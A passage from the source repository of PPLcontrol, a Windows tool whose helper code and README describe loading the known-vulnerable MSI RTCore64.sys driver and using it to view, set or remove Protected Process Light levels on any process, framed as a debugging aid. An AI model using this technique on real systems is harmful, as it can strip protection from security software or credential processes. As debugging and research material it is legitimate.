5 | { 6 | ULONG_PTR pKernelBaseAddress = 0; 7 | LPVOID* lpImageBase = NULL; 8 | DWORD dwBytesNeeded = 0; 9 | 10 | if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) 11 | goto cleanup; 12 | 13 | if (!(lpImageBase = (LPVOID*)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) 14 | goto cleanup; 15 | 16 | if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) 17 | goto cleanup; 18 | 19 | pKernelBaseAddress = ((ULONG_PTR*)lpImageBase)[0]; 20 | 21 | cleanup: 22 | if (lpImageBase) 23 | HeapFree(GetProcessHeap(), 0, lpImageBase); 24 | 25 | return pKernelBaseAddress; 26 | } 27 | 28 | ULONG_PTR Utils::GetKernelAddress(ULONG_PTR Base, DWORD Offset) 29 | { 30 | return Base + Offset; 31 | } 32 | 33 | UCHAR Utils::GetProtectionLevel(UCHAR Protection) 34 | { 35 | return Protection & 0x07; 36 | } 37 | 38 | UCHAR Utils::GetSignerType(UCHAR Protection) 39 | { 40 | return (Protection & 0xf0) >> 4; 41 | } 42 | 43 | UCHAR Utils::GetProtection(UCHAR ProtectionLevel, UCHAR SignerType) 44 | { 45 | return ((UCHAR)SignerType << 4) | (UCHAR)ProtectionLevel; 46 | } 47 | 48 | LPCWSTR Utils::GetProtectionLevelAsString(UCHAR ProtectionLevel) 49 | { 50 | switch (ProtectionLevel) 51 | { 52 | case PsProtectedTypeNone: 53 | return UTILS_STR_PROTECTION_LEVEL_NONE; 54 | case PsProtectedTypeProtectedLight: 55 | return UTILS_STR_PROTECTION_LEVEL_PPL; 56 | case PsProtectedTypeProtected: 57 | return UTILS_STR_PROTECTION_LEVEL_PP; 58 | } 59 | 60 | ERROR(L"Failed to retrieve the Protection level associated to the value %d.", ProtectionLevel); 61 | 62 | return L"Unknown"; 63 | } 64 | 65 | LPCWSTR Utils::GetSignerTypeAsString(UCHAR SignerType) 66 | { 67 | switch (SignerType) 68 | { 69 | case PsProtectedSignerNone: 70 | return UTILS_STR_SIGNER_TYPE_NONE; 71 | case PsProtectedSignerAuthenticode: 72 | return UTILS_STR_SIGNER_TYPE_AUTHENTICODE; 73 | case PsProtectedSignerCodeGen: 74 | return UTILS_STR_SIGNER_TYPE_CODEGEN; 75 | case PsProtectedSignerAntimalware: 76 | return UTILS_STR_SIGNER_TYPE_ANTIMALWARE; 77 | case PsProtectedSignerLsa: 78 | return UTILS_STR_SIGNER_TYPE_LSA; 79 | case PsProtectedSignerWindows: 80 | return UTILS_STR_SIGNER_TYPE_WINDOWS; 81 | case PsProtectedSignerWinTcb: 82 | return UTILS_STR_SIGNER_TYPE_WINTCB; 83 | case PsProtectedSignerWinSystem: 84 | return UTILS_STR_SIGNER_TYPE_WINSYSTEM; 85 | case PsProtectedSignerApp: 86 | return UTILS_STR_SIGNER_TYPE_APP; 87 | } 88 | 89 | ERROR(L"Failed to retrieve the Signer type associated to the value %d.", SignerType); 90 | 91 | return L"Unknown"; 92 | } 93 | 94 | UCHAR Utils::GetProtectionLevelFromString(LPCWSTR ProtectionLevel) 95 | { 96 | if (ProtectionLevel) 97 | { 98 | if (!_wcsicmp(ProtectionLevel, UTILS_STR_PROTECTION_LEVEL_PP)) 99 | return PsProtectedTypeProtected; 100 | else if (!_wcsicmp(ProtectionLevel, UTILS_STR_PROTECTION_LEVEL_PPL)) 101 | return PsProtectedTypeProtectedLight; 102 | } 103 | 104 | ERROR(L"Failed to retrieve the value of the Protection level '%ws'.", ProtectionLevel); 105 | 106 | return 0; 107 | } 108 | 109 | UCHAR Utils::GetSignerTypeFromString(LPCWSTR SignerType) 110 | { 111 | if (SignerType) 112 | { 113 | if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_AUTHENTICODE)) 114 | return PsProtectedSignerAuthenticode; 115 | else if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_CODEGEN)) 116 | return PsProtectedSignerCodeGen; 117 | else if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_ANTIMALWARE)) 118 | return PsProtectedSignerAntimalware; 119 | else if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_LSA)) 120 | return PsProtectedSignerLsa; 121 | else if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_WINDOWS)) 122 | return PsProtectedSignerWindows; 123 | else if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_WINTCB)) 124 | return PsProtectedSignerWinTcb; 125 | else if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_WINSYSTEM)) 126 | return PsProtectedSignerWinSystem; 127 | else if (!_wcsicmp(SignerType, UTILS_STR_SIGNER_TYPE_APP)) 128 | return PsProtectedSignerApp; 129 | } 130 | 131 | ERROR(L"Failed to retrieve the value of the Signer type '%ws'.", SignerType); 132 | 133 | return 0; 134 | } 135 | 136 | UCHAR Utils::GetSignatureLevel(UCHAR SignerType) 137 | { 138 | // https://www.alex-ionescu.com/?p=146 139 | switch (SignerType) 140 | { 141 | case PsProtectedSignerNone: 142 | return SE_SIGNING_LEVEL_UNCHECKED; 143 | case PsProtectedSignerAuthenticode: 144 | return SE_SIGNING_LEVEL_AUTHENTICODE; 145 | case PsProtectedSignerCodeGen: 146 | return SE_SIGNING_LEVEL_DYNAMIC_CODEGEN; 147 | case PsProtectedSignerAntimalware: 148 | return SE_SIGNING_LEVEL_ANTIMALWARE; 149 | case PsProtectedSignerLsa: 150 | return SE_SIGNING_LEVEL_WINDOWS; 151 | case PsProtectedSignerWindows: 152 | return SE_SIGNING_LEVEL_WINDOWS; 153 | case PsProtectedSignerWinTcb: 154 | return SE_SIGNING_LEVEL_WINDOWS_TCB; 155 | } 156 | 157 | ERROR(L"Failed to retrieve the Signature level associated to the Signer type value %d.", SignerType); 158 | 159 | return 0xff; 160 | } 161 | 162 | UCHAR Utils::GetSectionSignatureLevel(UCHAR SignerType) 163 | { 164 | // https://www.alex-ionescu.com/?p=146 165 | switch (SignerType) 166 | { 167 | case PsProtectedSignerNone: 168 | return SE_SIGNING_LEVEL_UNCHECKED; 169 | case PsProtectedSignerAuthenticode: 170 | return SE_SIGNING_LEVEL_AUTHENTICODE; 171 | case PsProtectedSignerCodeGen: 172 | return SE_SIGNING_LEVEL_STORE; 173 | case PsProtectedSignerAntimalware: 174 | return SE_SIGNING_LEVEL_ANTIMALWARE; 175 | case PsProtectedSignerLsa: 176 | return SE_SIGNING_LEVEL_MICROSOFT; 177 | case PsProtectedSignerWindows: 178 | return SE_SIGNING_LEVEL_WINDOWS; 179 | //case PsProtectedSignerWinTcb: 180 | // return SE_SIGNING_LEVEL_WINDOWS_TCB; 181 | case PsProtectedSignerWinTcb: 182 | return SE_SIGNING_LEVEL_WINDOWS; // Section signature level is actually 'Windows' in this case. 183 | } 184 | 185 | ERROR(L"Failed to retrieve the Section signature level associated to the Signer type value %d.", SignerType); 186 | 187 | return 0xff; 188 | } 189 | 190 | LPCWSTR Utils::GetSignatureLevelAsString(UCHAR SignatureLevel) 191 | { 192 | UCHAR bSignatureLevel; 193 | 194 | bSignatureLevel = SignatureLevel & 0x0f; // Remove additional flags 195 | 196 | switch (bSignatureLevel) 197 | { 198 | CASE_STR(SE_SIGNING_LEVEL_UNCHECKED); 199 | CASE_STR(SE_SIGNING_LEVEL_UNSIGNED); 200 | CASE_STR(SE_SIGNING_LEVEL_ENTERPRISE); 201 | CASE_STR(SE_SIGNING_LEVEL_DEVELOPER); 202 | CASE_STR(SE_SIGNING_LEVEL_AUTHENTICODE); 203 | CASE_STR(SE_SIGNING_LEVEL_CUSTOM_2); 204 | CASE_STR(SE_SIGNING_LEVEL_STORE); 205 | CASE_STR(SE_SIGNING_LEVEL_ANTIMALWARE); 206 | CASE_STR(SE_SIGNING_LEVEL_MICROSOFT); 207 | CASE_STR(SE_SIGNING_LEVEL_CUSTOM_4); 208 | CASE_STR(SE_SIGNING_LEVEL_CUSTOM_5); 209 | CASE_STR(SE_SIGNING_LEVEL_DYNAMIC_CODEGEN); 210 | CASE_STR(SE_SIGNING_LEVEL_WINDOWS); 211 | CASE_STR(SE_SIGNING_LEVEL_CUSTOM_7); 212 | CASE_STR(SE_SIGNING_LEVEL_WINDOWS_TCB); 213 | CASE_STR(SE_SIGNING_LEVEL_CUSTOM_6); 214 | } 215 | 216 | ERROR(L"Failed to retrieve the Signature level associated to the value 0x%02x.", SignatureLevel); 217 | 218 | return L"Unknown"; 219 | } -------------------------------------------------------------------------------- /PPLcontrol/Utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "common.h" 4 | 5 | #define UTILS_STR_PROTECTION_LEVEL_NONE L"None" 6 | #define UTILS_STR_PROTECTION_LEVEL_PP L"PP" 7 | #define UTILS_STR_PROTECTION_LEVEL_PPL L"PPL" 8 | #define UTILS_STR_SIGNER_TYPE_NONE L"None" 9 | 10 | #define UTILS_STR_SIGNER_TYPE_AUTHENTICODE L"Authenticode" 11 | #define UTILS_STR_SIGNER_TYPE_CODEGEN L"CodeGen" 12 | #define UTILS_STR_SIGNER_TYPE_ANTIMALWARE L"Antimalware" 13 | #define UTILS_STR_SIGNER_TYPE_LSA L"Lsa" 14 | #define UTILS_STR_SIGNER_TYPE_WINDOWS L"Windows" 15 | #define UTILS_STR_SIGNER_TYPE_WINTCB L"WinTcb" 16 | #define UTILS_STR_SIGNER_TYPE_WINSYSTEM L"WinSystem" 17 | #define UTILS_STR_SIGNER_TYPE_APP L"App" 18 | 19 | // The following signing levels are defined in winnt.h (see type SE_SIGNING_LEVEL) 20 | #define UTILS_STR_SE_SIGNING_LEVEL_UNCHECKED L"Unchecked" // 0x00000000 21 | #define UTILS_STR_SE_SIGNING_LEVEL_UNSIGNED L"Unsigned" // 0x00000001 22 | #define UTILS_STR_SE_SIGNING_LEVEL_ENTERPRISE L"Enterprise" // 0x00000002 23 | #define UTILS_STR_SE_SIGNING_LEVEL_DEVELOPER L"Developer" // 0x00000003 (Custom1) 24 | #define UTILS_STR_SE_SIGNING_LEVEL_AUTHENTICODE L"Authenticode" // 0x00000004 25 | #define UTILS_STR_SE_SIGNING_LEVEL_CUSTOM_2 L"Custom2" // 0x00000005 26 | #define UTILS_STR_SE_SIGNING_LEVEL_STORE L"Store" // 0x00000006 27 | #define UTILS_STR_SE_SIGNING_LEVEL_ANTIMALWARE L"Antimalware" // 0x00000007 (Custom3) 28 | #define UTILS_STR_SE_SIGNING_LEVEL_MICROSOFT L"Microsoft" // 0x00000008 29 | #define UTILS_STR_SE_SIGNING_LEVEL_CUSTOM_4 L"Custom4" // 0x00000009 30 | #define UTILS_STR_SE_SIGNING_LEVEL_CUSTOM_5 L"Custom5" // 0x0000000A 31 | #define UTILS_STR_SE_SIGNING_LEVEL_DYNAMIC_CODEGEN L"DynamicCodegen" // 0x0000000B 32 | #define UTILS_STR_SE_SIGNING_LEVEL_WINDOWS L"Windows" // 0x0000000C 33 | #define UTILS_STR_SE_SIGNING_LEVEL_CUSTOM_7 L"Custom7" // 0x0000000D 34 | #define UTILS_STR_SE_SIGNING_LEVEL_WINDOWS_TCB L"WindowsTcb" // 0x0000000E 35 | #define UTILS_STR_SE_SIGNING_LEVEL_CUSTOM_6 L"Custom6" // 0x0000000F 36 | 37 | #define CASE_STR( c ) case c: return UTILS_STR_##c 38 | 39 | class Utils 40 | { 41 | public: 42 | static ULONG_PTR GetKernelBaseAddress(); 43 | static ULONG_PTR GetKernelAddress(ULONG_PTR Base, DWORD Offset); 44 | static UCHAR GetProtectionLevel(UCHAR Protection); 45 | static UCHAR GetSignerType(UCHAR Protection); 46 | static UCHAR GetProtection(UCHAR ProtectionLevel, UCHAR SignerType); 47 | static LPCWSTR GetProtectionLevelAsString(UCHAR ProtectionLevel); 48 | static LPCWSTR GetSignerTypeAsString(UCHAR SignerType); 49 | static UCHAR GetProtectionLevelFromString(LPCWSTR ProtectionLevel); 50 | static UCHAR GetSignerTypeFromString(LPCWSTR SignerType); 51 | static UCHAR GetSignatureLevel(UCHAR SignerType); 52 | static UCHAR GetSectionSignatureLevel(UCHAR SignerType); 53 | static LPCWSTR GetSignatureLevelAsString(UCHAR SignatureLevel); 54 | }; -------------------------------------------------------------------------------- /PPLcontrol/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #define PPLCONTROL_DEBUG_ENABLED FALSE 7 | 8 | #define WIDEH(x) L##x 9 | #define WIDE(x) WIDEH(x) 10 | #define NOOP do {} while(0) 11 | 12 | #if PPLCONTROL_DEBUG_ENABLED == TRUE 13 | #define DEBUG_FORMAT( f ) "DEBUG: %ws | " f "\r\n" 14 | #define DEBUG( format, ... ) wprintf( WIDE(DEBUG_FORMAT(format)), WIDE(__FUNCTION__), __VA_ARGS__ ) 15 | #else 16 | #define DEBUG( format, ... ) NOOP 17 | #endif 18 | 19 | #ifdef ERROR 20 | #undef ERROR 21 | #endif 22 | #define ERROR_FORMAT( f ) "[-] " f "\r\n" 23 | #define ERROR( format, ... ) wprintf( WIDE(ERROR_FORMAT(format)), __VA_ARGS__ ) 24 | 25 | #define LASTERROR_FORMAT( f ) "[-] The function '" f "' failed with the error code 0x%08x.\r\n" 26 | #define LASTERROR( f ) wprintf( WIDE( LASTERROR_FORMAT(f)), GetLastError() ) 27 | 28 | #define INFO_FORMAT( f ) "[*] " f "\r\n" 29 | #define INFO( format, ... ) wprintf( WIDE(INFO_FORMAT(format)), __VA_ARGS__ ) 30 | 31 | #define SUCCESS_FORMAT( f ) "[+] " f "\r\n" 32 | #define SUCCESS( format, ... ) wprintf( WIDE(SUCCESS_FORMAT(format)), __VA_ARGS__ ) 33 | 34 | typedef enum _PS_PROTECTED_TYPE 35 | { 36 | PsProtectedTypeNone = 0, 37 | PsProtectedTypeProtectedLight = 1, 38 | PsProtectedTypeProtected = 2 39 | } PS_PROTECTED_TYPE, * PPS_PROTECTED_TYPE; 40 | 41 | typedef enum _PS_PROTECTED_SIGNER 42 | { 43 | PsProtectedSignerNone = 0, // 0 44 | PsProtectedSignerAuthenticode, // 1 45 | PsProtectedSignerCodeGen, // 2 46 | PsProtectedSignerAntimalware, // 3 47 | PsProtectedSignerLsa, // 4 48 | PsProtectedSignerWindows, // 5 49 | PsProtectedSignerWinTcb, // 6 50 | PsProtectedSignerWinSystem, // 7 51 | PsProtectedSignerApp, // 8 52 | PsProtectedSignerMax // 9 53 | } PS_PROTECTED_SIGNER, * PPS_PROTECTED_SIGNER; -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PPLcontrol 2 | 3 | ## Description 4 | 5 | This tool allows you to list protected processes, get the protection level of a specific process, or set an arbitrary protection level. For more information, you can read this blog post: [Debugging Protected Processes](https://itm4n.github.io/debugging-protected-processes/). 6 | 7 | ## Usage 8 | 9 | ### 1. Download the MSI driver 10 | 11 | You can get a copy of the MSI driver `RTCore64.sys` here: [PPLKiller/driver](https://github.com/RedCursorSecurityConsulting/PPLKiller/tree/master/driver). 12 | 13 | ### 2. Install the MSI driver 14 | 15 | __Disclaimer:__ it goes without saying that you should never install this driver on your host machine. __Use a VM!__ 16 | 17 | ```batch 18 | sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner" 19 | net start RTCore64 20 | ``` 21 | 22 | ### 3. Use PPLcontrol 23 | 24 | List protected processes. 25 | 26 | ```batch 27 | PPLcontrol.exe list 28 | ``` 29 | 30 | Get the protection level of a specific process. 31 | 32 | ```batch 33 | PPLcontrol.exe get 1234 34 | ``` 35 | 36 | Set an arbitrary protection level. 37 | 38 | ```batch 39 | PPLcontrol.exe set 1234 PPL WinTcb 40 | ``` 41 | 42 | Protect a non-protected process with an arbitrary protection level. This will also automatically adjust the signature levels accordingly. 43 | 44 | ```batch 45 | PPLcontrol.exe protect 1234 PPL WinTcb 46 | ``` 47 | 48 | Unprotect a protected process. This will set the protection level to `0` (_i.e._ `None`) and the EXE/DLL signature levels to `0` (_i.e._ `Unchecked`). 49 | 50 | ```batch 51 | PPLcontrol.exe unprotect 1234 52 | ``` 53 | 54 | ### 4. Uninstall the driver 55 | 56 | ```batch 57 | net stop RTCore64 58 | sc.exe delete RTCore64 59 | ``` 60 | 61 | ## Use cases 62 | 63 | ### Debugging a protected process with WinDbg 64 | 65 | WinDbg just needs to open the target process, so you can use PPLcontrol to set an arbitrary protection level on your `windbg.exe` process. 66 | 67 | 1. Get the PID of the `windbg.exe` process. 68 | 2. Use PPLcontrol to set an arbitrary protection level. 69 | 70 | ```console 71 | C:\Temp>tasklist | findstr /i windbg 72 | windbg.exe 1232 Console 1 24,840 K 73 | C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb 74 | [+] The Protection 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'. 75 | [+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232. 76 | ``` 77 | 78 | ### Inspecting a protected process with API Monitor 79 | 80 | In addition to opening the target process, API monitor injects a DLL into it. Therefore, setting an arbitrary protection level on your `apimonitor.exe` process won't suffice. Since the injected DLL is not properly signed for this purpose, the Section signature flag of the target process will likely prevent it from being loaded. However, you can temporarily disable the protection on the target process, start monitoring it, and restore the protection right after. 81 | 82 | ```txt 83 | Failed to load module in target process - Error: 577, Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. 84 | ``` 85 | 86 | 1. Get the PID of the target process. 87 | 2. Use PPLcontrol to get the protection level of the target process. 88 | 3. Unprotect the process. 89 | 4. Start monitoring the process with API Monitor. 90 | 5. Restore the protection of the target process. 91 | 92 | ```console 93 | C:\Temp>tasklist | findstr /i target 94 | target.exe 1337 Services 1 14,160 K 95 | C:\Temp>PPLcontrol.exe get 1337 96 | [+] The process with PID 1337 is a PPL with the Signer type 'WinTcb' (6). 97 | C:\Temp>PPLcontrol.exe unprotect 1337 98 | [+] The process with PID 1337 is no longer a PP(L). 99 | 100 | C:\Temp>PPLcontrol.exe protect 1337 PPL WinTcb 101 | [+] The Protection 'PPL-WinTcb' was set on the process with PID 1337, previous protection was: 'None-None'. 102 | [+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1337. 103 | ``` 104 | 105 | ## Build 106 | 107 | 1. Open the solution in Visual Studio. 108 | 2. Select `Release/x64` (`x86` is not supported and will probably never be). 109 | 3. Build solution 110 | 111 | ## Credit 112 | 113 | - [@aceb0nd](https://twitter.com/aceb0nd) for the tool [PPLKiller](https://github.com/RedCursorSecurityConsulting/PPLKiller) 114 | - [@aionescu](https://twitter.com/aionescu) for the article [Protected Processes Part 3: Windows PKI Internals (Signing Levels, Scenarios, Root Keys, EKUs & Runtime Signers)](https://www.alex-ionescu.com/?p=146) 115 | --------------------------------------------------------------------------------